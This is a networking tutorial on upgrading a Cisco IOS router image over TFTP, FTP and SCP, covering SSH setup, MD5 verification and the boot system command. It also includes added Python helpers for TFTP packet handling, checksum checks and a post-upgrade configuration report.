Once you have downloaded the IOS image, check that you have enough space left on your flash memory:

R1#show flash:
-#- --length-- -----date/time------ path
1         1119 Sep 29 2015 11:11:52 00:00 r1-r2-r3.cfg
2         1184 Dec 3 2014 15:14:06 00:00 R1-R2-ASA1-ASA2.cfg
3         1125 Dec 23 2014 13:41:32 00:00 ASA1-R1-R2-R3.cfg
5           76 Jul 17 2014 12:09:10 00:00 System Volume Information/IndexerVolumeGuid
6         1060 Aug 11 2015 12:53:50 00:00 mpls-pe-ce-basic-addressing.cfg
7         1213 Sep 30 2015 15:05:02 00:00 router-on-a-stick.cfg
8     67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin

3862364160 bytes available (137428992 bytes used)

On my flash memory, there are a number of configuration files and the current IOS image. There are 3862364160 bytes available (3862 MB), so we have plenty of space.

When we want to copy something to or from this router, we have to use the copy command:

R1#copy ?
  /erase          Erase destination file system.
  /error          Allow to copy error file.
  /noverify       Don’t verify image signature before reload.
  /verify         Verify image signature before reload.
  archive:        Copy from archive: file system
  cns:            Copy from cns: file system
  flash:          Copy from flash: file system
  ftp:            Copy from ftp: file system
  http:           Copy from http: file system
  https:          Copy from https: file system
  null:           Copy from null: file system
  nvram:          Copy from nvram: file system
  pram:           Copy from pram: file system
  rcp:            Copy from rcp: file system
  running-config  Copy from current system configuration
  scp:            Copy from scp: file system
  startup-config  Copy from startup configuration
  system:         Copy from system: file system
  tar:            Copy from tar: file system
  tftp:           Copy from tftp: file system
  tmpsys:         Copy from tmpsys: file system
  xmodem:         Copy from xmodem: file system
  ymodem:         Copy from ymodem: file system

We have a lot of options. The most common options for copying an IOS image are:

  • TFTP
  • FTP
  • SCP

I will explain all three options to you.

Newer routers also support copying from USB sticks. This will show up as usbflash: in the filesystem overview.

TFTP

TFTP (Trivial File Transfer Protocol) is similar to FTP but much simpler, like a lightweight version. It doesn't support authentication or encryption and uses UDP for transmission, so it belongs on a trusted management network only. I will use the following topology:

We need a TFTP server application, a great choice here is TFTPD32. You can download it for free and it’s an executable, no need to install anything.

Once you downloaded TFTPD32, start it:

And you will see the main screen:

Make sure you select the correct directory where you downloaded your iOS image and if you have multiple network interfaces, select the correct interface.

The copy command works in both directions: I can copy to and from the TFTP server. Here's how to copy the current IOS image to the TFTP server:

R1#copy flash: tftp:
Source filename []? c2800nm-adventerprisek9-mz.151-4.M10.bin
Address or name of remote host []? 192.168.1.200
Destination filename [c2800nm-adventerprisek9-mz.151-4.M10.bin]?

67926080 bytes copied in 312.508 secs (217358 bytes/sec)

When you use the copy flash: tftp: command, it will ask you for the IP address and filename. When you see something between [] (brackets), you can just hit the enter button. For example, since I specified the source name, the router assumes I want to use the same file name for the destination. Don’t type “y” or “yes” here or that will become the destination filename.
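It is worth seeing what the router actually puts on the wire when you type copy flash: tftp: or copy tftp: flash:, because it makes the "no authentication" remark above concrete. The Python below is an added example, not code from this article or from TFTPD32: it encodes and decodes RFC 1350 packets (a read or write request is nothing more than an opcode, a filename and a transfer mode) and reassembles a transfer from 512-byte DATA blocks the way the receiving side does, including the short final block that marks the end. The image bytes are a constructed stand-in; the filename is the one used in the article.

```python
import struct

# RFC 1350 opcodes
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK_SIZE = 512  # default block size; a DATA block shorter than this ends the transfer

# Constructed stand-in for an image file (1027 bytes -> blocks of 512, 512 and 3 bytes).
SAMPLE_IMAGE = bytes(range(256)) * 4 + b"END"


def build_request(opcode, filename, mode="octet"):
    """RRQ is what 'copy tftp: flash:' sends, WRQ what 'copy flash: tftp:' sends.
    The packet carries a filename and a mode and nothing else: the server has no
    credential to check, which is what 'no authentication' means in practice."""
    if opcode not in (RRQ, WRQ):
        raise ValueError("opcode must be RRQ or WRQ")
    return (struct.pack("!H", opcode)
            + filename.encode("ascii") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def build_data(block, payload):
    """DATA packet: 2-byte opcode, 2-byte block number, up to BLOCK_SIZE bytes."""
    if len(payload) > BLOCK_SIZE:
        raise ValueError("payload exceeds block size")
    return struct.pack("!HH", DATA, block) + payload


def build_ack(block):
    return struct.pack("!HH", ACK, block)


def parse_packet(pkt):
    """Decode one TFTP packet into a dict; ValueError on malformed input."""
    if len(pkt) < 4:
        raise ValueError("packet too short")
    (opcode,) = struct.unpack("!H", pkt[:2])
    if opcode in (RRQ, WRQ):
        fields = pkt[2:].split(b"\x00")
        # "name\0mode\0" splits into [name, mode, b""]; RFC 2347 options may follow
        if len(fields) < 3 or fields[-1] != b"":
            raise ValueError("malformed request")
        return {"opcode": opcode,
                "filename": fields[0].decode("ascii"),
                "mode": fields[1].decode("ascii").lower()}
    (block,) = struct.unpack("!H", pkt[2:4])
    if opcode == DATA:
        return {"opcode": DATA, "block": block, "payload": pkt[4:]}
    if opcode == ACK:
        return {"opcode": ACK, "block": block}
    if opcode == ERROR:
        message = pkt[4:].split(b"\x00", 1)[0].decode("ascii", "replace")
        return {"opcode": ERROR, "code": block, "message": message}
    raise ValueError(f"unknown opcode {opcode}")


def split_into_blocks(data):
    """Sender side: number the blocks from 1. A file that is an exact multiple of
    BLOCK_SIZE needs an extra empty block so the receiver can see the end."""
    packets = []
    block = 1
    for off in range(0, len(data), BLOCK_SIZE):
        packets.append(build_data(block, data[off:off + BLOCK_SIZE]))
        block = (block + 1) & 0xFFFF  # block numbers wrap at 16 bits
    if len(data) % BLOCK_SIZE == 0:
        packets.append(build_data(block, b""))
    return packets


def reassemble(packets):
    """Receiver side: accept blocks strictly in order, ACK each one, and stop at
    the first short block. Returns (file_bytes, acks_sent)."""
    out, acks, expected = bytearray(), [], 1
    for pkt in packets:
        p = parse_packet(pkt)
        if p["opcode"] != DATA or p["block"] != expected:
            raise ValueError(f"expected DATA block {expected}, got {p}")
        out += p["payload"]
        acks.append(build_ack(expected))
        if len(p["payload"]) < BLOCK_SIZE:
            return bytes(out), acks
        expected = (expected + 1) & 0xFFFF
    raise ValueError("transfer ended without a terminating short block")


def demo():
    """Round-trip the sample image through the sender and receiver helpers."""
    rrq = build_request(RRQ, "c2800nm-adventerprisek9-mz.151-4.M12a.bin")
    image, acks = reassemble(split_into_blocks(SAMPLE_IMAGE))
    return {"request": parse_packet(rrq), "blocks": len(acks), "intact": image == SAMPLE_IMAGE}
```

Run demo() to see the decoded request and the block count for the sample. Because the only thing protecting a TFTP transfer is the network path, the MD5 verification described later in this article is the step that tells you the file arrived intact.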


We can see the transfer on our router or you can see it in TFTPD32:

We now have a backup of our current IOS image. Let's copy the new image to the router:

R1#copy tftp: flash:
Address or name of remote host []? 192.168.1.200
Source filename []? c2800nm-adventerprisek9-mz.151-4.M12a.bin
Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]?
Accessing tftp://192.168.1.200/c2800nm-adventerprisek9-mz.151-4.M12a.bin...
Loading c2800nm-adventerprisek9-mz.151-4.M12a.bin from 192.168.1.200 (via FastEthernet0/0):
[OK - 67929600 bytes]

67929600 bytes copied in 316.628 secs (214541 bytes/sec)

The transfer has completed, let’s take a look at our flash memory:

R1#show flash: | include .bin
8     67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin
25    67929600 Nov 4 2016 12:11:22 00:00 c2800nm-adventerprisek9-mz.151-4.M12a.bin

Above we can see the new IOS image.

The copy command also allows you to enter parameters like the IP address of the TFTP server and filenames. Here is an example:

R1#copy tftp://192.168.1.200/c2800nm-adventerprisek9-mz.151-4.M12a.bin flash:
Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]?

Above you can see that I already entered the IP address and filename. Once I hit enter, it only asks me for the destination filename (which I could also have entered). If you have to upgrade the IOS image on multiple devices, this is more convenient: you can paste the same line on all of them.

You can also turn a Cisco IOS router or switch into a TFTP server. You only need one command to accomplish this:

R1(config)#tftp-server flash:c2800nm-advipservicesk9-mz.124-24.T8.bin alias 2800-image.bin

The alias parameter lets clients request the file under a different name. In the example above, a client that asks for “2800-image.bin” receives c2800nm-advipservicesk9-mz.124-24.T8.bin, the actual file on the flash of my router.

FTP

Copying to or from an FTP server is also no problem, we can do this with the same copy command. One thing you might have to deal with is authentication. Most FTP servers will require a username and password. Here is the topology I will use:

There are two ways to supply a username and password. Here is option one:

R1(config)#ip ftp username admin
R1(config)#ip ftp password cisco

We can globally configure the username and password that we want to use for the FTP server. When you use the copy command, Cisco IOS will use these values for authentication.


Personally, I don’t like leaving this information in the running configuration. It’s also possible to supply a username and password with the copy command. Here is an example:

R1#copy ftp://admin:cisco@192.168.1.201/c2800nm-adventerprisek9-mz.151-4.M12a.bin flash:
Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]?
Accessing ftp://:@192.168.1.201/c2800nm-adventerprisek9-mz.151-4.M12a.bin...
Loading c2800nm-adventerprisek9-mz.151-4.M12a.bin from 192.168.1.201 (via FastEthernet0/0):
[OK - 67929600 bytes]

67929600 bytes copied in 884.704 secs (76782 bytes/sec)

Above you can see I embedded the username “admin”, the password “cisco” and the IP address of my FTP server. This way is also easier: you can paste this line on all devices that require an IOS image upgrade. Keep in mind that FTP still sends these credentials in clear text, whichever way you supply them.

SCP

Last but not least, we have SCP (Secure Copy), which runs over SSH. This is a great method for three reasons:

  • It allows you to use your router/switch as an SCP server.
  • It uses encryption.
  • You probably already have SSH configured on your router or switch.

I will show you how to configure your router as an SCP server and how to copy files to/from it. I’m going to use two routers for this:

R1 Configuration

First, we have to configure SSH:

R1(config)#ip domain-name NETWORKLESSONS.LOCAL
R1(config)#line vty 0 4
R1(config-line)#transport input ssh
R1(config-line)#login local
R1(config)#crypto key generate rsa
The name for the keys will be: R1.NETWORKLESSONS.LOCAL
Choose the size of the key modulus in the range of 360 to 4096 for your
  General Purpose Keys. Choosing a key modulus greater than 512 may take
  a few minutes.

How many bits in the modulus [512]: 1024
% Generating 1024 bit RSA keys, keys will be non-exportable...
[OK] (elapsed time was 3 seconds)

R1(config)#ip ssh version 2

Now we only need two additional commands for SCP. The first one is to enable the SCP server:

R1(config)#ip scp server enable

And we need a user that has full access to the router:

R1(config)#username admin privilege 15 password cisco

Let’s continue with R2, our SCP client.

R2 Configuration

R2 will be our SCP client. Let’s try the copy command:

R2#copy scp: flash:
Address or name of remote host []? 192.168.1.1
Source username []? admin
Source filename []? c2800nm-adventerprisek9-mz.151-4.M12a.bin
Destination filename [c2800nm-adventerprisek9-mz.151-4.M12a.bin]?
Password:

67929600 bytes copied in 884.704 secs (76782 bytes/sec)

The copy command will ask for the remote IP address, username, password, and filename.

MD5 Verification

So far we have copied a couple of files, but how do we know that these files are valid? When we downloaded the Cisco IOS image, I showed you the MD5 checksum that Cisco publishes on its website. We can compute the same checksum on our router:

R1#verify /md5 flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin
..........Done!
verify /md5 (flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin) = fcdaeb55b292534e97ecc29a394d35aa

This MD5 checksum is the same as the one we found on the Cisco website, so we have the file Cisco published and it has not been altered on its way to the router. If the checksums do not match, the copy may be corrupt or someone may have added something nasty to the image; do not boot it.
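The same check belongs on the workstation, before the image ever reaches the TFTP, FTP or SCP server, and the router's verify /md5 output can then be compared against the same published value. The Python below is an added example, not code from this article or from Cisco: it hashes the image file in chunks, compares digests in constant time and tolerates the case and whitespace differences you get from copy-pasting, and parses the last line of the router's verify /md5 output. Cisco's download page lists a SHA512 checksum next to the MD5 one, so the helper computes both. The image bytes and the "published" digests used in demo() are constructed for the example; the real values come from the download page.

```python
import hashlib
import hmac
import re

# Constructed stand-in for the downloaded image; real images are ~65 MB.
SAMPLE_IMAGE = b"constructed stand-in for c2800nm-adventerprisek9-mz.151-4.M12a.bin\n" * 1000

# Last line of IOS 'verify /md5 <file>' output: verify /md5 (<path>) = <32 hex digits>
VERIFY_LINE = re.compile(r"verify /md5 \((?P<path>[^)]+)\) = (?P<digest>[0-9a-fA-F]{32})")


def file_digests(data, algorithms=("md5", "sha512")):
    """Hash the image once per algorithm, streaming 1 MiB at a time as you
    would for a real file rather than holding several copies in memory."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    view = memoryview(data)
    for off in range(0, len(view), 1 << 20):
        chunk = view[off:off + (1 << 20)]
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def digest_matches(computed_hex, published_hex):
    """Tolerate case/whitespace differences from copy-paste; compare in constant time."""
    a, b = computed_hex.strip().lower(), published_hex.strip().lower()
    return len(a) == len(b) and hmac.compare_digest(a, b)


def parse_verify_output(text):
    """Pull (path, digest) out of the router's 'verify /md5' output, or None."""
    m = VERIFY_LINE.search(text)
    return (m.group("path"), m.group("digest").lower()) if m else None


def check_image(data, published_md5, published_sha512=None, router_output=None):
    """Compare the local file with Cisco's published digests and, optionally,
    confirm that the router computed the same MD5 over the copy it received."""
    local = file_digests(data)
    result = {"md5_ok": digest_matches(local["md5"], published_md5)}
    if published_sha512 is not None:
        result["sha512_ok"] = digest_matches(local["sha512"], published_sha512)
    if router_output is not None:
        parsed = parse_verify_output(router_output)
        result["router_ok"] = parsed is not None and digest_matches(parsed[1], published_md5)
    return result


def demo():
    # Constructed: what the download page would list for SAMPLE_IMAGE.
    published = file_digests(SAMPLE_IMAGE)
    # Constructed router transcript in the format shown in this article.
    router_output = (
        "R1#verify /md5 flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin\n"
        "..........Done!\n"
        f"verify /md5 (flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin) = {published['md5']}\n"
    )
    good = check_image(SAMPLE_IMAGE, published["md5"], published["sha512"], router_output)
    # A single appended byte changes every digest.
    tampered = check_image(SAMPLE_IMAGE + b"\x00", published["md5"], published["sha512"])
    return good, tampered
```

The reference digest should come from the Cisco download page itself, not from a file that travelled with the image: a checksum copied from the same untrusted location as the image proves nothing.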

Boot System

Our router currently has two IOS images:

R1#show flash: | include .bin
8     67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin
25    67929600 Nov 4 2016 12:11:22 00:00 c2800nm-adventerprisek9-mz.151-4.M12a.bin

Which IOS image will it select when the router boots? Deleting the old IOS image is one option, but there is another way.

Most routers boot the first image they find in flash memory, so in our case that means the older IOS image. We can change this with the boot system command:

R1(config)#boot system flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin

R1#reload
System configuration has been modified. Save? [yes/no]: yes
Building configuration...
[OK]

Once the router has reloaded, verify that we are running the new IOS image:

R1#show version
Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Tue 04-Oct-16 03:37 by prod_rel_team

ROM: System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)

R1 uptime is 14 minutes
System returned to ROM by reload at 14:01:00 UTC Fri Nov 4 2016
System image file is flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin

Above we can see that we booted the new Cisco IOS image.

Want to take a look for yourself? Here you will find the final configuration of each device.

hostname R1
!
boot system flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin
!
ip cef
!
ip domain name NETWORKLESSONS.LOCAL
!
username admin privilege 15 password 0 cisco
!
ip ssh version 2
ip scp server enable
!
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
 duplex auto
 speed auto
!
line vty 0 4
 login local
 transport input ssh
!
end
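The reload check in the Boot System section and the final configuration above can be turned into a post-upgrade report. The Python below is an added example, not code from this article: it parses the saved configuration, the output of show flash: | include .bin and the System image file line of show version to confirm that the boot system entry points at an image that is present in flash, that the router actually booted that image, and which older image remains as a fallback. It also lists credentials that the configuration stores as type 0 (or with no type at all), such as the username line above. The three sample texts are constructed to mirror the transcripts in this article; the parser accepts the System image file value with or without the quotes IOS normally prints.

```python
import re

# Constructed samples mirroring the transcripts in this article.
FINAL_CONFIG = """\
hostname R1
!
boot system flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin
!
ip domain name NETWORKLESSONS.LOCAL
!
username admin privilege 15 password 0 cisco
!
ip ssh version 2
ip scp server enable
!
line vty 0 4
 login local
 transport input ssh
!
end
"""

FLASH_LISTING = """\
R1#show flash: | include .bin
8     67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin
25    67929600 Nov 4 2016 12:11:22 00:00 c2800nm-adventerprisek9-mz.151-4.M12a.bin
"""

SHOW_VERSION = """\
R1#show version
Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
R1 uptime is 14 minutes
System returned to ROM by reload at 14:01:00 UTC Fri Nov 4 2016
System image file is "flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin"
"""


def parse_flash_images(listing):
    """{filename: size_in_bytes} for the .bin entries of 'show flash:' output."""
    images = {}
    for line in listing.splitlines():
        m = re.match(r"\s*\d+\s+(\d+)\s+.*\s(\S+\.bin)\s*$", line)
        if m:
            images[m.group(2)] = int(m.group(1))
    return images


def parse_boot_system(config):
    """The first 'boot system' entry, e.g. 'flash:c2800...bin', or None."""
    m = re.search(r"^boot system (\S+)", config, re.M)
    return m.group(1) if m else None


def parse_running_image(show_version):
    """The image the router actually booted, quotes stripped, or None."""
    m = re.search(r'^System image file is "?([^"\s]+)"?', show_version, re.M)
    return m.group(1) if m else None


# A password given as type 0, or with no type number at all, is stored as typed.
# (Type 7 is only obfuscated; hashed 'secret' lines are not matched here.)
CLEARTEXT_RE = re.compile(
    r"^(?:username \S+ (?:privilege \d+ )?|ip ftp |enable )password (?:0 )?(?!\d+ )\S+"
)


def find_cleartext_credentials(config):
    """Configuration lines whose password is stored in clear text."""
    return [line.strip() for line in config.splitlines() if CLEARTEXT_RE.match(line.strip())]


def post_upgrade_report(config, flash_listing, show_version):
    """Cross-check boot configuration, flash contents and the booted image."""
    images = parse_flash_images(flash_listing)
    boot = parse_boot_system(config)
    running = parse_running_image(show_version)
    boot_file = boot.split(":", 1)[-1] if boot else None
    return {
        "boot_image_in_flash": boot_file in images,
        "running_matches_boot": boot is not None and running == boot,
        "fallback_images": sorted(name for name in images if name != boot_file),
        "cleartext_credentials": find_cleartext_credentials(config),
    }
```

Call post_upgrade_report(FINAL_CONFIG, FLASH_LISTING, SHOW_VERSION) with the real command output pasted in place of the samples; an empty fallback_images list means the old image has already been deleted, which is worth knowing before the next reload.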

Conclusion

You have now learned how to upgrade your Cisco IOS image through TFTP, FTP and SCP. You have seen how this can be done from your computer to your router/switch or between two routers. We also checked how to verify the integrity of the file with the MD5 checksum and how to configure your router to boot the new IOS image.